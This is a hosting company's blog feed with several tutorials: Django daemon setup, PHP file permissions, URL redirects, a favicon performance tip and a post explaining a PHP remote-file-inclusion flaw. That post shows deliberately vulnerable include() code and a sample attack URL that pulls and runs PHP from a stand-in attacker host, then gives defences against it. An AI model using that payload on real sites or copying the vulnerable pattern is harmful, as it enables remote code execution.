Tips & Tricks – NearlyFreeSpeech.NET Blog https://blog.nearlyfreespeech.net A blog from the staff at NearlyFreeSpeech.NET. Mon, 17 Nov 2014 00:47:37 +0000 en-US hourly 1 How-To: Django on NearlyFreeSpeech.NET https://blog.nearlyfreespeech.net/2014/11/17/how-to-django-on-nearlyfreespeech-net/ https://blog.nearlyfreespeech.net/2014/11/17/how-to-django-on-nearlyfreespeech-net/#comments Mon, 17 Nov 2014 00:18:38 +0000 https://blog.nearlyfreespeech.net/?p=464 Now that our persistent process feature is out of beta, this is the first in a series of brief tutorials designed to show how to make use of the feature. In this example, we’ll deploy a minimal Django site using WSGI. Although a lot of this is specific to Django, it also demonstrates most of the steps you would use with other frameworks, like Node.JS or Ruby on Rails. (And we’ll be adding how-to articles for those in the future.)

Getting your site ready for Django

First, create the site. When you get to the, “Server Type” panel, select the “[Production] Apache 2.4 Generic” option.

ServerType

(You can also use the “[Production] Custom” option; it’s faster if you want Django to serve the whole site, but in this example, we’re also going to demonstrate how to let our Apache server handle a directory of static images.)

Once that’s done, you’ll immediately notice the new “Daemons” and “Proxies” boxes on the site info panel:

DaemonsAndProxies

but you can ignore those for now. We’ll get back to them.

If it’s still 2014 when you read this, our base Django environment hasn’t been around very long, so it hasn’t had time to work its way into the default realm for new sites. (That’ll be happening in January 2015, so if you’re reading this in the future, you may be able to skip this step. Also, hello future, please send lotto numbers!) So for now you’ll need to update your site realm to indigo or white to get the newest code. Just click the “Edit” button on the “CGI/SSH Realm” line of your site’s Config Information box:

ConfigInformation

And choose the “indigo” or “white” realm. For this article, we’ll use the indigo realm:

SiteRealm

Install Django via ssh

Next, log into the ssh server to set up the actual Django app.


$ ssh jdw_django@nfsnssh
[django /home/public]$ mkdir images
[django /home/public]$ cd /home/protected
[django /home/protected]$ mkdir django
[django /home/protected]$ cd django/
[django /home/protected/django]$ django-admin startproject helloworld .
[django /home/protected/django]$ python manage.py migrate
Operations to perform:
Apply all migrations: admin, contenttypes, auth, sessions
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying sessions.0001_initial... OK
[django /home/protected/django]$ cd ..

If you were expecting a bunch of stuff here involving Python’s virtualenv feature, you can totally do that if you want. It’s handy if you need a bunch of python modules we don’t provide. We don’t need it for this article, but if you need it, you probably already know what it is, how it works, and where to insert it into the steps above.

Next, we need a run script. A run script is how our system starts your daemon. You can use it to customize command line arguments and environment variables (or to jump into a Python virtualenv) before your daemon starts. The main thing to be aware of with run scripts is that they need to run the actual daemon in the foreground, which can sometimes be tricky. But that’s how Django rolls anyway, so we won’t have any problems there.

You can use whatever text editor you want to create your run script. (Just make sure if you create it on Windows that it winds up with Unix line endings.) Ordinarily I would use the one true editor (vi) at this point, but the run script is very simple and vi isn’t photogenic, so we’ll just enter it directly:


[django /home/protected]$ cat >run-django.sh <<NFSN_FEEL_THE_POWER
> #!/bin/sh
> exec python manage.py runserver
> NFSN_FEEL_THE_POWER
[django /home/protected]$ chmod a+x run-django.sh

At this point, django is pretty much set up. If you want to prove it, you can try running it from the command line:


[django /home/protected]$ cd django/
[django /home/protected/django]$ ../run-django.sh
Performing system checks...

System check identified no issues (0 silenced).
November 16, 2014 - 21:36:18
Django version 1.7, using settings 'helloworld.settings'
Starting development server at http://127.0.0.1:8000/
Quit the server with CONTROL-C.

Now, the ssh server is a restricted environment, so you can’t access anything running there from anywhere but there. So we can open another ssh window to check it out:


[django /home/public]$ curl -i http://localhost:8000/
HTTP/1.0 200 OK
Date: Sun, 16 Nov 2014 21:39:04 GMT
Server: WSGIServer/0.1 Python/2.7.8
Vary: Cookie
X-Frame-Options: SAMEORIGIN
Content-Type: text/html

<!DOCTYPE html>
... blah blah blah ...
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
... blah blah blah ...

Looks good! So now we can close the second ssh window, and go back to the first one where we’ll see our footprints:


[16/Nov/2014 21:39:04] "GET / HTTP/1.1" 200 1759

From there, follow the instructions to quit the server (hit CONTROL-C). But leave this ssh session around. We’ll come back to it later.

Now, we’ve got to tell our system about Django, so it will get started (and if ever necessary, restarted) Back to the UI!

Telling our system about Django

First, we’ll add a Daemon for Django from the Site Information panel in the member interface:

AddDaemon

Shocking no-one, this will need some configuration:

AddDaemonOptions

The tag is just a short name for the daemon. Tags are unique on a per-site basis, so everybody can have a django of their very own, but only one per site. (If for some reason you needed another, there’s nothing wrong with django2.) It’ll also need to know the name of the run script we created and where to run it from. In this case, we want to be inside the Django directory so when the run script will be able to find manage.py. And we run it as the web user, which is what you should always do for a daemon that serves web pages. (Other types of daemons, like custom databases, should probably run as “me.”)

Next, we’ll have to add two proxy entries, one to send most of the site’s traffic to Django, and one to exclude some static files we don’t want Django to handle.

The first proxy entry will send most of the site’s requests to Django. It’s added from the Site Information Panel:

AddFirstProxy

And configured like this:

AddFirstProxyOptions

Python takes care of mapping HTTP to WSGI for us, so this is an HTTP proxy. It’s handling the whole site, so the base URI is /. The document root value is usually / unless your custom server needs something different. (For example, PHP-FPM wants the absolute path to your site’s top-level PHP files.) Any port from 1024 to 65535 can be used as long as the same value is used both in our UI and in the configuration of the daemon. We’ll use 8000 for the target port because that’s what Django already said it wanted when we ran it on the ssh server above. And unlike the ssh server, you don’t have to worry about what anyone else is doing. Every site can use whatever ports are needed in this range.

If we wanted Django to handle absolutely the whole site, we’d use the “Direct” option to bypass Apache entirely. That’s faster and scales better, so it’s often a good choice. Our network will still automatically reverse proxy your static content whenever possible, so it doesn’t much matter that Django isn’t optimized for that.

But here we want to exclude the /images/ directory, so it doesn’t get sent to Django. To do this, we’ll leave Direct unchecked, add that proxy, and then go back to the Site Information panel to add a second entry:

AddSecondProxy

And configure it as a “none” option, which tells our system to send requests for some URLs back through Apache to a directory under public:

AddSecondProxyOptions

In this case, we want /images/ to point to the “images” directory we created in /home/public way back at the beginning, so both paths will be “/images/” as shown. The port value doesn’t matter for a “none” proxy; and it won’t be used.

D’Artagnan!

Once this is all done, Django is ready to spring into action. Our UI should look like this:

DjangoUIFinal

And the live site looks like this:

DjangoSite

(Assuming you use an improbably small but conveniently-screenshot-sized browser window. Also note that we served the image above from the django site’s static images directory we set up.)

Of course, when it says “you haven’t actually done any work yet,” it’s understating the case a little. Setting up Django isn’t effortless, but it is pretty easy.

Interacting with your pet Daemon

Now, if we head back to ssh, we can interact with our daemon a bit. First, we’ll check out its output. This is particularly helpful for troubleshooting a run script in case your daemon won’t start.


[django /home/public/images]$ cd /home/logs
[django /home/logs]$ ls
daemon_django.log
[django /home/logs]$ cat daemon_django.log
[16/Nov/2014 22:05:41] "GET / HTTP/1.1" 200 1759
[16/Nov/2014 22:05:42] "GET /favicon.ico HTTP/1.1" 404 1935
[16/Nov/2014 22:33:40] "GET / HTTP/1.1" 200 1759
[16/Nov/2014 22:56:45] "GET / HTTP/1.1" 200 1759

But you can also connect to your daemon if you want.


[django /home/logs]$ curl -i http://django.local:8000/
HTTP/1.0 200 OK
Date: Sun, 16 Nov 2014 23:37:39 GMT
Server: WSGIServer/0.1 Python/2.7.8
Vary: Cookie
X-Frame-Options: SAMEORIGIN
Content-Type: text/html

... blah blah blah ...

This isn’t super-useful for Django, but it’s handy for other processes like databases, so you can connect to them with admin tools. Just change “django” to your actual site’s short name as shown in our UI.

From here, the next step is to create an amazing and cool Django-powered site hosted on our service. That is left as an exercise for the reader.

If you want to learn more about Django, check out the DjangoGirls tutorial. (Also works for boys.) If you’ve done all the steps above, you can try picking up their tutorial here.

That’s it for this intro to the persistent process feature. Next time, Node.JS!

]]>
https://blog.nearlyfreespeech.net/2014/11/17/how-to-django-on-nearlyfreespeech-net/feed/ 8
A PHP Include Exploit Explained https://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/ https://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/#comments Thu, 05 Nov 2009 05:37:10 +0000 http://blog.nearlyfreespeech.net/?p=148 We are having a fairly consistent problem with spammers auto-exploiting a very common type of scripting vulnerability that appears on our members’ sites. Unlike most vulnerabilities that stem from a faulty version of some app a lot of people use, this one crops up primarily on sites containing PHP code that people write themselves.

Cleaning up the resulting messes is getting a little tedious and so, even though this is hardly a new exploit, I wanted to write a little bit about what the vulnerability is, how it works, how spammers exploit it, and how to keep your site safe.

Let’s start with the problem code. If you’ve written a PHP script on your site that contains code similar to the below, you’re probably vulnerable:

$page = $_GET['page'] . ".php";
include($page);

A lot of people seem to use code like this. If they call this script exploitme.php, then the URL’s for these type of sites wind up looking like this:

http://example.nfshost.com/exploitme.php?page=main
http://example.nfshost.com/exploitme.php?page=contact
http://example.nfshost.com/exploitme.php?page=faq

Then, they put the body of each page into main.php, contact.php, and faq.php. They put the stuff that’s the same on every page in exploitme.php and, presto, instant mini-CMS.

How does this get exploited?

When interacting with this script, the attacker has no need to limit themselves to the URLs the page author intended. What they use instead tends to look like this:

http://example.nfshost.com/exploitme.php?page=http://badsite.example.com/urhacked.txt%3F

Most people don’t know that include() will happily pull in the contents of that urhacked.txt file from some other site and execute it. The other site doesn’t even have to be running PHP; the exploit code could be on some other already-hacked site, or anywhere that the hacker can put a text file.

The “urhacked.txt” file actually contains whatever PHP commands the attacker wants to execute. Typically, this means sending out tons of spam, which comes from the vulnerable site. Spotting the huge email queue from a site that’s never sent email in its life is usually how we find out about it. But that’s not all they can do; this is an “arbitrary code” exploit. They can do whatever they want using the same privileges the exploited page has. Security researchers call exploits of this type the confused deputy problem.

What makes this particular vulnerability even worse is that it’s possible to detect and exploit automatically. Attackers are smart enough to query search engines for lists of pages with links embedded in the format shown above. All their attack script needs to do is identify the URL of your page and the name of the variable used to hold the target page.

This is a problem because a whole lot of people think “no one bad will ever find or bother trying to exploit my little site.” They don’t realize that it’s it’s no bother; it’s done completely automatically. If you’ve got a vulnerability like this, getting exploited is not “if,” it’s “when.”

Also, the %3F at the end of the attacker’s “page” value decodes into a question mark. This is because the attacker assumes the site will add .php or something to the name they give it to get the filename to load. So the URL that the site winds up loading looks like this:

http://badsite.example.com/urhacked.txt?.php

Assuming that urhacked.txt is a static file, the ? and everything after it will be discarded and the malicious contents will be returned no matter what the site adds at the end.

How to prevent it?

Our default permissions and user/group setup prevent a lot of these from getting worse; by default the attacker cannot execute system commands, create, remove, or (worse) edit files. But the attackers can (and do) send spam. And they can read any files on your site that contain stuff like database passwords you’d probably rather they didn’t have.

Worse, sometimes people irritated with the complexities of getting permissions and ownership exactly right leave things wide open. When that mindset encounters this vulnerability, the resulting damage to the affected site is usually unrecoverable.

So, the first thing one tends to want to do upon finding out about this is to disable the ability of PHP’s include() function to load files from remote sites. PHP allows this by adding the following to .htaccess:

php_flag allow_url_include false

This is a good start, and definitely something to consider, but one of the authors of the Suhosin PHP security patch explained why that is inadequate some years ago.

The second thing that seems obvious is using file_exists() to make sure the file really exists before trying to load it. But file_exists() works on URL’s too. D’oh!

There are two viable ways of eliminating this vulnerability.

The best approach, and the one we recommend, is not to create it in the first place. If you want five PHP pages to share a common header and footer (for example), then reverse the include(). In other words, the URL from the “main” example above:

http://example.nfshost.com/exploitme.php?page=main

changes to reference the main.php file directly:

http://example.nfshost.com/main.php

And then main.php looks like this:

<?php include(".../path/to/header.php"); ?>
The same main page content that was always there.
<?php include("…/path/to/footer.php"); ?>

This way, the exploitme.php script goes away (split into header and footer) and the site never has to trust the user about what belongs inside the very powerful include() statement. Adding a couple of lines (at most) of boilerplate code to each page of content is a small price to pay to entirely eliminate an entire category of security problems.

The second approach is to scrupulously validate the inputs before acting on them. Unfortunately it’s very easy to get this wrong. So to help people get it right, we’re going to walk through the four necessary steps. (All four are essential, skip any one and the whole exercise becomes an elaborate waste of time.) They are:

  1. Examine and reject any input that isn’t entirely formed of “friendly” characters (e.g. letters and numbers).
  2. Put the “content” files (e.g. main.php, contact.php, faq.php) in a special subdirectory of your site’s “protected” directory.*
  3. Always refer to files handled in this way using absolute paths and/or system environment variables.
  4. Test the existence of the file before you include it.

Here’s a simple example:

$page = $_GET['page'];
if (!preg_match("/^[A-Za-z0-9_]+$/", $page))
    throw new BadPageException("Bad character(s)", $page);
$path = "{$_SERVER['NFSN_SITE_ROOT']}/protected/pages/{$page}.php";
if (!file_exists($path)) 
    throw new BadPageException("Page not found", $page);
include($path);

class BadPageException extends Exception {
    function __construct($err, $page) {
        $page = urlencode($page);
        if (strlen($page) > 128)
            $page = substr($page, 0, 128) . "…";
        parent::__construct("Error \"{$err}\" on \"{$page}\"");
    }
}

Line 1 retrieves the page name from the query string.
Lines 2-3 abort if it isn’t composed entirely of ASCII letters, numbers, and the underscore (_). (Step 1)
Line 4 correlates the page name with a specific filename in a special directory just for these types of pages (Step 2) using an absolute path based on site-independent environment variables (Step 3)
Lines 5-6 abort if the resulting filename doesn’t exist. (Step 4)
Line 7 includes the file.
Lines 9-16 are probably overkill for a “simple” example, but we wanted to show people how to do it right in the real world. When something goes wrong, these lines document the problem. The complexity here comes from “defanging” the requested page name before printing it in an error message. Usually you would want to configure your site to write such messages to its error log, so this protects against 10 pages of gibberish, or codes that will mess up your terminal when you look at it, etc.

So that’s it, one of the most common classes of exploit explored and examined, complete with working sample code. Please, please if you code your own PHP, take a few minutes and check to see if your site suffers from this problem. We waste hours every week cleaning up the messes it causes, and we sure like to spend that time improving the service.

(Commented source available here.)

* For blog guests who may not be members of our service: On our service, each web site has a “public” directory and a “protected” directory. Files in “public” are directly accessible via the web, and files in “protected” are not. The contents of the “protected” directory are, however, accessible to scripts in the “public” directory. I.e., they can be accessed, but only indirectly by accessing the site’s public interface. This makes “protected” a good place to put data, include files, or other stuff that scripts need in order to run, but that you don’t want just anybody to download. The concept and terms are borrowed from object-oriented programming.

]]>
https://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/feed/ 12
Quick WordPress Performance Tip: Create a favicon https://blog.nearlyfreespeech.net/2009/06/16/quick-wordpress-performance-tip-create-a-favicon/ https://blog.nearlyfreespeech.net/2009/06/16/quick-wordpress-performance-tip-create-a-favicon/#comments Tue, 16 Jun 2009 20:10:13 +0000 http://blog.nearlyfreespeech.net/?p=94 One of our members’ WordPress blogs got heavily FARKed a bit ago. Alarms went off, we thought the server was going to crash. That’s pretty unusual, of course, so we looked into it and found something really interesting: the blog’s performance problem was entirely caused by the lack of a favicon.ico file.

To quote Adrian Monk: “Here’s what happened…”

WordPress uses a handful of rewrite rules to present “pretty URLs” to visitors:

RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) - [PT,L]
RewriteRule ^(.*) index.php

What this does is that if the file or directory the visitor is asking for doesn’t exist in the site’s filesystem (as blog entries do not), it pushes the request into the WordPress engine to be handled. WordPress doesn’t do very well when asked to serve things that do not exist. There are a lot of things that a particular link could be, and it has to check them all before finally erroring out.

Since favicon.ico doesn’t exist but gets requested at least once by everyone who even thinks about visiting the site, it was causing a huge amount of server load to generate all these 404 pages that nobody would ever see.

With the site owner’s permission, we created a zero-length favicon.ico file in the site’s public directory until they could make one themselves, and the problem immediately went away. The change was so immediately and so profound that we felt compelled to blog about it.

While this happened on WordPress, it’s worth remembering for any application or custom code that drives every incoming request into a PHP or CGI handler. Everybody who visits your site (and some people who don’t) will request /favicon.ico, so make sure you know what happens when they do.

Preferably before FARK and company get ahold of it! 🙂

]]>
https://blog.nearlyfreespeech.net/2009/06/16/quick-wordpress-performance-tip-create-a-favicon/feed/ 5
Surprise WordPress Upgrade https://blog.nearlyfreespeech.net/2008/04/08/surprise-wordpress-upgrade/ https://blog.nearlyfreespeech.net/2008/04/08/surprise-wordpress-upgrade/#comments Tue, 08 Apr 2008 04:30:21 +0000 http://blog.nearlyfreespeech.net/?p=42 We received a note from Technorati today about a serious security problem with old versions of WordPress, including the version we were running, that is now being exploited on a widespread scale. We’ve thus hastily upgraded to WordPress 2.5. That did cause a brief bit of disruption to the “News & Announcements” portion of our member site, which is now resolved.

If you want to run WordPress, you too may want to check whether you’re running the most current version with the latest patches. Better safe than sorry!

]]>
https://blog.nearlyfreespeech.net/2008/04/08/surprise-wordpress-upgrade/feed/ 2
Writing files in PHP https://blog.nearlyfreespeech.net/2007/01/28/writing-files-in-php/ https://blog.nearlyfreespeech.net/2007/01/28/writing-files-in-php/#comments Sun, 28 Jan 2007 18:08:24 +0000 http://blog.nearlyfreespeech.net/2007/01/28/writing-files-in-php/ The “traditional” web server just reads and sends out files in response to incoming requests. Consequently, the standard security configuration is therefore set up to give web accesses the bare minimum in terms of file permissions: the ability to read the site’s files, but not to change them.

But many PHP applications want to write files as well: forums that support uploading files, CMS applications, and many Wikis all create or update files as a normal part of their operation. Since the default permissions don’t allow it, many people run into trouble when trying to develop or install PHP applications that need this ability. This blog post will attempt to show how to do this on our system in a way that is easy to set up and very secure.

On Unix systems like ours, each file has two owners: a user and a group. On our system, the user who owns your files is usually identified to you as “me” and the web server runs as user “web.” Similarly, there are two groups: “me” and “web.” When you are logged in to the ssh server, your default group is group “me” but you are a member of both “me” and “web.” The web server, on the other hand, is limited to the “web” group.

PHP safe_mode imposes a number of restrictions above and beyond standard Unix filesystem permissions. For the most part, these restrictions are designed to prevent multiple sites on a shared host (like ours) from trampling each other. However, if applied properly, they also provided opportunities for you to limit damage to your own site in the event of a bug or exploitable security flaw.

The secret to using this feature properly is to set the proper group ownership on your PHP scripts. If your PHP script is intended to read and write other files in your web space (or related directories), then the script should be owned by the “web” group.

In order for the web server to write to files or directories in your web space, it needs write permissions. As far as the Unix filesystem goes, there are two ways for it to get that: the file can have group “web” and be group writable, or it can have group “me” and be world writable. However, with PHP, that is not sufficient.

On our system, for PHP to be able to write to a file, the group of the file (or parent directory, if creating a file) must match the group of the PHP script doing the writing. If you want a PHP script to be able to write files, you should take the additional step of setting that script’s group to “web.” You’ll also need to make sure that the destination directory for created files has group “web” and that it is group writable.

If this is set up properly, these two steps form a sort of interlock: you specify which scripts are permitted write files, you specify where files are permitted to be written, and the only combination that will succeed is if a permitted script tries to write to a permitted location. Everything else is off limits. This effectively protects the rest of your files from being unexpectedly overwritten by your file-writing scripts, and it prevents other PHP scripts from writing files at all, even if they later turn out to have a security problem that might otherwise allow it.

It’s also possible to get PHP to write files by setting the target file (or directory) to group “me” and giving it world write permissions. However, doing so forgoes all of the above protection, and so it is not recommended. You can also run into problems with this approach if the PHP script intends to create a directory and then create a file in that directory.

All of our member sites have a “protected” directory at the same level as the “public” (aka “htdocs” for older sites) directory that contains your web-accessible material. The “protected” directory cannot be directly accessed via the web, but it has the appropriate ownership and permissions already set for PHP scripts with group “web” to be able to write files. This makes it an ideal, safe place for your site to store and maintain support files without having to worry about what access controls are needed to prevent visitors from accessing those support files directly over the web.

As a final caveat, make sure the PHP scripts you set to group “web” are not group-writable, because that would grant the server permission to modify the script itself, which is generally undesirable.

Update: As of 2012, this post is five years old. Most of it still applies to “Fast” PHP prior to 5.4. The primary difference is that the synthetic “me” user/group is no longer used; you will instead see a unique numeric username for each site.

]]>
https://blog.nearlyfreespeech.net/2007/01/28/writing-files-in-php/feed/ 1
Forwarding sites & URL rewriting https://blog.nearlyfreespeech.net/2006/11/17/forwarding-sites-url-rewriting/ https://blog.nearlyfreespeech.net/2006/11/17/forwarding-sites-url-rewriting/#comments Fri, 17 Nov 2006 05:23:30 +0000 http://blog.nearlyfreespeech.net/2006/11/17/forwarding-sites-url-rewriting/ Note: the content of this blog entry is deprecated. Please search our member FAQ for “canonical” for more information about replacement techniques.

We recently got a support inquiry about alternate methods of forwarding visitors from one URL to another.

We have a FAQ entry about using “decoy” sites to forward alternate URLs. This is one method, and probably the easiest, but there are many others that can be useful in different circumstances.

What I’d like to do here is talk about the reasons why we recommend this one and discuss some of the alternatives and when they might be more useful.

The premise of URL forwarding is that a web site should have a single canonical name. Other names might exist, but they’re usually alternate names, or variant spellings, or similar. These names might be common typos you want to catch, easier to type, or whatever. But the actual site accesses should use the canonical name, because that’s best for search engine rankings and long-term recognition of your site.

By far the most common case is when you have a domain name, such as example.com, and you want to use http://www.example.com/ and http://example.com/ to access the site, so that’s the case I’ll focus on here. I’ll also assume that www.example.com is the canonical name of choice. (The temptation to use the bare domain can be very high for some people, but see this FAQ entry for a discussion of reasons why we recommend against it.)

Our FAQ entry suggests creating a forwarding site, assigning example.com to it as an alias, and creating a one-line .htaccess file in its htdocs directory:

RedirectPermanent / http://www.example.com/

We generally recommend creating an alternate site because this is the most efficient approach. With this method, people who enter one of the “wrong” names hit the decoy site and get redirected to the canonical name right up front, and there’s zero extra overhead on any subsequent requests. It’s also really easy to do, and it’s impossible to screw up your working site while setting it up.

Second, we recommend the RedirectPermanent Apache directive for two reasons. The “permanent” redirect code (301) helps keep search engines and the like from continuously trying to index the “wrong” name instead of the right one. Also, the Apache Redirect family works for subordinate URLs. One of the most common redirection mistakes is a setup that will correctly redirect http://example.com/ to http://www.example.com/, but won’t redirect http://example.com/something.html to http://www.example.com/something.html. RedirectPermanent is a one-line solution that handles such cases flawlessly.

One thing that’s come up a couple of times is that once you have a forward for one alternate name, you can add as many other alternate names for the same site as you want. This is easily done by just adding the alternate aliases to the forwarding site.

Now, let’s take a look at an entirely different approach. The ultimate tool for URL rewriting is, of course, the Apache rewrite module, mod_rewrite. It’s possible to use it to accomplish the exact same thing, but without the use of a second site. To do so, you just create an .htaccess file in the site root containing the following:

RewriteEngine on
RewriteCond %{HTTP_HOST} !^www.example.com$ [NC]
RewriteRule ^.*$ http://www.example.com%{REQUEST_URI} [R=301,L]

To summarize how this works in a nutshell:

1) “RewriteEngine on” is needed to enable mod_rewrite.

2) RewriteCond applies a condition under which rewriting will occur. In this case, we want to rewrite if the %{HTTP_HOST} (the content of the HTTP Host: header, which is where the requested domain name lives) does not (the !) match www.example.com from beginning to end (the ^ and $, respectively), without regard to uppercase or lowercase (the [NC]). So this will skip www.example.com and www.ExAmPlE.com but not example.com or any other alias you might want to add.

3) This RewriteRule applies to the whole URL, no matter what it is (the ^.*$) and changes it to the correct name (the http://www.example.com) while keeping the same URI path (the %{REQUEST_URI}) and sends it back to the client as a 301 redirect (the R=301) and skip any other rewrite rules (the L).

The possible big advantage for this method is that it effectively suppresses the use of the default site names we provide (example.nfshost.com), if that’s important to you. It also doesn’t require the existance of an alternate site, if you find that distasteful for some reason. The disadvantage is the extra overhead, which applies to absolutely every request, whether it’s using a URL that needs rewriting or not. (Also, as I personally don’t care for mod_rewrite I consider the use of it a fundamental drawback, but that is more bias on my part than a viable objection.)

The specific question we got was about creating a rewrite site that can handle multiple independent destinations. In this situation, you have a large number of names to rewrite to as well as from. In other words, not just redirecting http://example.com/ to http://www.example.com/ but also redirecting http://other.com/ to http://www.other.com/, all from a single site. RedirectPermanent isn’t smart enough to handle that, but mod_rewrite is.

For this approach, create one “generic” forwarding site from the “sites” tab, and create an .htaccess file in that site’s htdocs directory that looks like this:

RewriteEngine on
RewriteCond %{HTTP_HOST} ^example.com$ [NC]
RewriteRule ^.*$ http://www.example.com%{REQUEST_URI} [R=301,L]
RewriteCond %{HTTP_HOST} ^other.com$ [NC]
RewriteRule ^.*$ http://www.other.com%{REQUEST_URI} [R=301,L]

You can add more sites (to and from) by repeating the RewriteCond and RewriteRule lines. The only real difference between this and the previous example is that we ditched the ! in the RewriteCond lines, meaning that instead of applying to names that don’t match, we apply to names that do.

So that’s three different approaches to the same problem. All work, but they are useful in different circumstances. We can’t document everything in our FAQ, but I’m hoping that one of the uses of our new blog will be the opportunity to explore alternatives like this that might be helpful to our members.

]]>
https://blog.nearlyfreespeech.net/2006/11/17/forwarding-sites-url-rewriting/feed/ 2